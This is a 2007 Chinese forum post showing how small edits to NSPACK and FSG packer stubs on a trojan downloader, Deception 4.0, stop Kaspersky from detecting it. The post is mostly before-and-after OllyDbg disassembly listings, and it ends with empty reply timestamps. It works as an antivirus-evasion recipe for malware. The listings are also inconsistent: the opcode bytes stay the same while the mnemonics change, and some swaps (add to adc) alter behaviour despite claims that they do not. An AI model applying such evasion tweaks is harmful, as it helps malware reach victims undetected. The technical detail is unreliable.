简介:在众多反病毒产品中,卡巴斯基在用户口碑相当不错,很多用户都说卡巴司基的虚拟机脱壳技术很强。然而笔者仅仅对通用的“加壳”步骤进行了小小的调整,却有了惊人的发现——仅通过简单的壳头修改,卡巴大叔竟然无语了。
“小样,你以为你穿了马甲我就不认识你了?”这句台词耳熟能详。现在用户用这句话来形容反病毒厂商的脱壳技术。这项技术的产生与病毒程序编写者使用的“加壳”技术密切相关。
众所周知,所谓“加壳”就是一种通过一系列数学运算,将可执行程序文件或动态链接库文件的编码进行改变,以达到缩小文件体积或加密程序编码的目的。运行时,外壳程序先被执行,然后由这个外壳程序负责将用户原有的程序在内存中解压缩,并把控制权交还给脱壳后的真正程序。一切操作自动完成,用户不知道也无需知道壳程序是如何运行的。一般情况下,加壳程序和未加壳程序的运行结果是一样的。
面对病毒编写者为其病毒“加壳”的问题,反病毒厂商自然而然地采用“脱壳”技术。脱壳的一般流程包括,查壳、寻找OEP(入口点,防止被破解)、Dump(卸出)、修复等步骤。目前,脱壳能力强弱则成为杀毒软件查杀病毒能力如何的重要衡量指标。
病毒编写者与反病毒厂商之间新一轮博弈在“加壳”与“脱壳”两个共生技术之间展开了。
在众多反病毒产品中,卡巴斯基在用户口碑相当不错,很多用户都说卡巴司基的虚拟机脱壳技术很强。然而笔者仅仅对通用的“加壳”步骤进行了小小的调整,却有了惊人的发现——仅通过简单的壳头修改,卡巴大叔竟然无语了。
笔者随便在网络上下了一个国外的下载者Deception4.0(以下简称DT)。卡巴是杀它的,不然测试就没法进行了。虽然只修改了加在DT上的9,但是按照这种方式加在其他的可执行文件上卡巴也是不报毒的,其中修改后的程序保证了程序的可再运行,不然这种修改是无意义的测试。开始操作,下面准备了八个最常见的壳。
一、首先对NSPACK3.6的测试
用OD载入被加过NSPACK壳的DT,复制出前十几行,如下(蓝色加粗是要被修改的部位,以下格式如一)
004CF302 E8 00000000 call 复件_(2).004CF307
004CF307 5D pop ebp
004CF308 83C5 F9 sub ebp,7
004CF30B 8D85 0CFFFFFF lea eax,dword ptr ss:[ebp-F4]
004CF311 8338 01 cmp dword ptr ds:[eax],1
004CF314 0F84 47020000 je 复件_(2).004CF561
004CF31A C700 01000000 mov dword ptr ds:[eax],1
004CF320 8BD5 mov edx,ebp
004CF322 2B95 A0FEFFFF sub edx,dword ptr ss:[ebp-160]
004CF328 8995 A0FEFFFF mov dword ptr ss:[ebp-160],edx
004CF32E 1195 D0FEFFFF add dword ptr ss:[ebp-130],edx
004CF334 8DB5 14FFFFFF lea esi,dword ptr ss:[ebp-EC]
004CF33A 1116 add dword ptr ds:[esi],edx
修改成如下(红色部分)
004CF302 E8 00000000 call 复件_(2).004CF307
004CF307 5D pop ebp
004CF308 83C5 F9 add ebp,-7
004CF30B 8D85 0CFFFFFF lea eax,dword ptr ss:[ebp-F4]
004CF311 8338 01 cmp dword ptr ds:[eax],1
004CF314 0F84 47020000 je 复件_(2).004CF561
004CF31A C700 01000000 mov dword ptr ds:[eax],1
004CF320 8BD5 mov edx,ebp
004CF322 2B95 A0FEFFFF sub edx,dword ptr ss:[ebp-160]
004CF328 8995 A0FEFFFF mov dword ptr ss:[ebp-160],edx
004CF32E 1195 D0FEFFFF adc dword ptr ss:[ebp-130],edx
004CF334 8DB5 14FFFFFF lea esi,dword ptr ss:[ebp-EC]
004CF33A 1116 adc dword ptr ds:[esi],edx
之后保存文件,用卡巴扫描,不再报毒。
二、FSG2.0的测试
OD载入被FSG2.0加了壳的DT
复制出前十几行,如下
00400154 f> 8725 2C115300 xchg dword ptr ds:[53112C],esp
0040015A 61 popad
0040015B 94 xchg eax,esp
0040015C 55 push ebp
0040015D A4 movs byte ptr es:[edi],byte ptr ds:>
0040015E B6 80 mov dh,80
00400160 FF13 call dword ptr ds:[ebx]
00400162 ^ 77 F9 jnb short fsg2_0.0040015D
00400164 33C9 xor ecx,ecx
00400166 FF13 call dword ptr ds:[ebx]
00400168 77 16 jnb short fsg2_0.00400180
0040016A 33C0 xor eax,eax
修改后如下
00400154 f> 8725 2C115300 xchg dword ptr ds:[53112C],esp
0040015A 61 popad
0040015B 94 xchg eax,esp
0040015C 55 push ebp
0040015D A4 movs byte ptr es:[edi],byte ptr ds:>
0040015E B6 80 mov dh,80
00400160 FF13 call dword ptr ds:[ebx]
00400162 ^ 77 F9 ja short fsg2_0.0040015D
00400164 33C9 xor ecx,ecx
00400166 FF13 call dword ptr ds:[ebx]
00400168 77 16 ja short fsg2_0.00400180
0040016A 33C0 xor eax,eax
卡巴扫描,不再报毒。 |
发表于 2007-9-21 22:23:53
发表于 2007-9-21 23:08:55
发表于 2007-9-21 23:54:40
